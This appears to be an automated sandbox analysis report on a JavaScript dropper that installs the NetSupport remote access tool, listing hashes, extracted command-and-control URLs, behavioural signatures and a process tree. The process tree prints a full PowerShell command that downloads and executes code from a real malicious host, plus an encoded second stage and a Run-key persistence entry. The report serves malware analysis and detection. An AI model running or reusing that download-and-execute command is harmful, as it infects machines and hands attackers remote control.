Analysis

max time kernel: 92s
max time network: 140s
platform: windows10-2004_x64
resource: win10v2004-20231222-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231222-en, locale:en-us, os:windows10-2004-x64, system
submitted: 07-02-2024 09:32
Static task: static1

Behavioral task: behavioral1
  Sample: ARS17291729317291729.js
  Resource: win7-20231215-en

Behavioral task: behavioral2
  Sample: ARS17291729317291729.js
  Resource: win10v2004-20231222-en
General

Target: ARS17291729317291729.js
Size: 22KB
MD5: f11df5cf2e7e9c6b39612f3f60d9e9f2
SHA1: d919fe3bd69418f9e96569f9e73b4a1fa1cde9e9
SHA256: 2770b332ef571a1462e5a38778307106e16ba66dca58717fe40f6f76259b717b
SHA512: 1629a66eb3f8f48fa15d016995eb26f7b6342420eac8f34fdf42d514db1be5813df7a40f553b63da16b8eb6bde66d35297d23c63cffa252951988a28242e65bf
SSDEEP: 384:swbhSjLO+uDvTeLoxguxAR02OY4PLRyxag8YvA9DWWRUwuoLljIzPNWHvrHejQlJ:pwLOxvTeLoxguxARGPLRyxag8YvA9DWu
Malware Config

Extracted: https://assime.ca/command.php
Extracted: http://sakaleralo.com/ccea268b-8716-46be-9148-3e614b38a0df.txt
Signatures

NetSupport
NetSupport is a remote access tool sold as legitimate system administration software.

Blocklisted process makes network request (2 IoCs)
Processes:
flow | pid | process
15 | 4080 | powershell.exe
17 | 4776 | powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely for geofencing.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | wscript.exe

Executes dropped EXE (1 IoC)
Processes:
pid | process
1480 | client32.exe

Loads dropped DLL (5 IoCs)
Processes:
pid | process
1480 | client32.exe
1480 | client32.exe
1480 | client32.exe
1480 | client32.exe
1480 | client32.exe

Adds Run key to start application (2 TTPs, 1 IoC)
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\modem_gprs_modules = "C:\\Users\\Admin\\AppData\\Local\\modem_gprs_modules\\client32.exe" | powershell.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes:
pid | process
4080 | powershell.exe
4080 | powershell.exe
4776 | powershell.exe
4776 | powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
description | pid | process
Token: SeDebugPrivilege | 4080 | powershell.exe
Token: SeDebugPrivilege | 4776 | powershell.exe
Token: SeSecurityPrivilege | 1480 | client32.exe

Suspicious use of FindShellTrayWindow (1 IoC)
Processes:
pid | process
1480 | client32.exe

Suspicious use of WriteProcessMemory (7 IoCs)
Processes:
description | pid | process | target process
PID 3604 wrote to memory of 4080 | 3604 | wscript.exe | powershell.exe
PID 3604 wrote to memory of 4080 | 3604 | wscript.exe | powershell.exe
PID 4080 wrote to memory of 4776 | 4080 | powershell.exe | powershell.exe
PID 4080 wrote to memory of 4776 | 4080 | powershell.exe | powershell.exe
PID 4776 wrote to memory of 1480 | 4776 | powershell.exe | client32.exe
PID 4776 wrote to memory of 1480 | 4776 | powershell.exe | client32.exe
PID 4776 wrote to memory of 1480 | 4776 | powershell.exe | client32.exe
Processes

Level 1: C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS17291729317291729.js
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 3604

  Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 4080

    Level 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Nop -ExeCUtIONPol bYPASS -W hI -eNco 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
      - Blocklisted process makes network request
      - Adds Run key to start application
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 4776

      Level 4: C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe
        Command line: "C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of FindShellTrayWindow
        PID: 1480
Network
MITRE ATT&CK Enterprise v15
Downloads